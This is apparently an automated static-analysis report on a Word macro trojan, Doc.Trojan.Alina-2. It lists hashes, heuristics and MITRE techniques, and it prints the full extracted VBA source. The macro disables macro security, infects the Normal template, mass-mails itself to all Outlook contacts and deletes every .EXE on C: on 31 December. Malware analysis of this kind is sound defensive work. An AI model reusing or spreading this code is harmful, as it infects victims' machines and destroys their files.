Doc.Trojan.Alina-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 c7312fd568b0b617…

MALICIOUS

Office (OLE)

49.5 KB Created: 2000-06-09 09:12:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 7e817d786d16b3ec4c0eb9d0909a5da3 SHA-1: 28d1f0c8d932f2095df1f745c3bb1cc7b117f79a SHA-256: c7312fd568b0b61781f832828cb059413a439bd449cf1fe61d11b6e22be7fcf4
420 Risk Score

Malware Insights

Doc.Trojan.Alina-2 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1566.001 Spearphishing Attachment

The sample contains VBA macros that execute automatically upon opening the document, as indicated by the 'Document_Open' subroutine. These macros attempt to disable security settings and modify registry keys, specifically targeting 'HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security' and 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion' for 'RegisteredOwner' and 'RegisteredOrganization'. This behavior is consistent with malware designed to prepare the system for further exploitation or payload delivery.

Heuristics 9

  • ClamAV: Doc.Trojan.Alina-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Alina-2
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 36,151 bytes but its declared streams total only 0 bytes — 36,151 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMS
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3941 bytes
SHA-256: 8e935842d67362b48de31e014bf715656cadfdc46ca4b4c586bc840041fc2295
Detection
ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_New()
Call Alina
End Sub
Private Sub Document_Close()
Call Alina
End Sub
Private Sub Document_Open()
Call Alina
End Sub
Private Sub Alina()
On Error Resume Next
CustomizationContext = NormalTemplate
FindKey(KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11)).Disable
FindKey(KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF8)).Disable
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Lavel") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Lavel") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
CommandBars("Tools").Controls("Macro").Visible = False
CommandBars("View").Controls("Toolbars").Enabled = False
CommandBars("View").Controls("Toolbars").Visible = False
Options.VirusProtection = False: Options.SaveNormalPrompt = False: Options.ConfirmConversions = False
End If
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOwner") <> "L21TF21R/L9T15N" Then
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "L21TF21R/L9T15N"""
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOrganization") = "Sh9br1mp21r/C15m9ll1"
End If
SR = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "SystemRoot")
Set ADC1 = ActiveDocument.VBProject.VBComponents(1)
Set NDC1 = NormalTemplate.VBProject.VBComponents(1)
ExportFile1 = SR + "\Fateha.Dll"
ExportFile2 = SR + "\Invoice.Dll"
If Dir(ExportFile1) = "Fateha.dll" Then Kill ExportFile1
If Dir(ExportFile2) = "Invoice.dll" Then Kill ExportFile2
If ADC1.CodeModule.CountOfLines > 0 Then ADC1.Export (ExportFile1)
If NDC1.CodeModule.CountOfLines > 0 Then NDC1.Export (ExportFile2)
If ADC1.CodeModule.CountOfLines > 0 Then
For I = 1 To ADC1.CodeModule.CountOfLines
ADC1.CodeModule.DeleteLines 1
Next
End If
ADC1.CodeModule.AddFromFile (ExportFile2)
If ADC1.CodeModule.CountOfLines > 0 Then
For I = 1 To 4
ADC1.CodeModule.DeleteLines 1
Next
Else
ADC1.CodeModule.AddFromFile (ExportFile1)
For I = 1 To 4
ADC1.CodeModule.DeleteLines 1
Next
End If
If NDC1.CodeModule.CountOfLines > 0 Then
For I = 1 To NDC1.CodeModule.CountOfLines
NDC1.CodeModule.DeleteLines 1
Next
End If
NDC1.CodeModule.AddFromFile (ExportFile1)
If NDC1.CodeModule.CountOfLines > 0 Then
For I = 1 To 4
NDC1.CodeModule.DeleteLines 1
Next
Else
NDC1.CodeModule.AddFromFile (ExportFile2)
For I = 1 To 4
NDC1.CodeModule.DeleteLines 1
Next
End If
If Application.MAPIAvailable = True Then
Dim UDO, DMN, BUOS
Set UDO = CreateObject("Outlook.Application")
Set DMN = UDO.GetNameSpace("MAPI")
DMN.Logon "profile", "password"
For l = DMN.AddressLists.Count To 1 Step -1
Set ADB = DMN.AddressLists(l)
I = 0
Set BUOS = UDO.CreateItem(0)
For t = ADB.AdressEntries.Count To 1 Step -1
o = ADB.AddressEntries(I)
BUOS.Recipients.Add o
I = I + 1
If I = ADB.AddressEntries.Count Then
t = 1
End If
Next t
BUOS.Subject = "Product Catalogue."
BUOS.Body = "Our product catalogue attached here:="
BUOS.Attachments.Add ActiveDocument.FullName
BUOS.Send
o = ""
Next l
DMN.Logoff
End If
If Day(Now) = 31 And Month(Now) = 12 Then
With Application.FileSearch
    .LookIn = "C:\"
    .SearchSubFolders = True
    .FileName = "*.EXE"
    .Execute
    For I = 1 To .FoundFiles.Count
    Kill .FoundFiles(I)
    Next I
End With
End If
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
embedded_office_off000038c9.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x38C9 36151 bytes
SHA-256: c2393268c5db060088f44bc32352d10b3e4d5f07e63c7ac3e87a55f51474c257
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.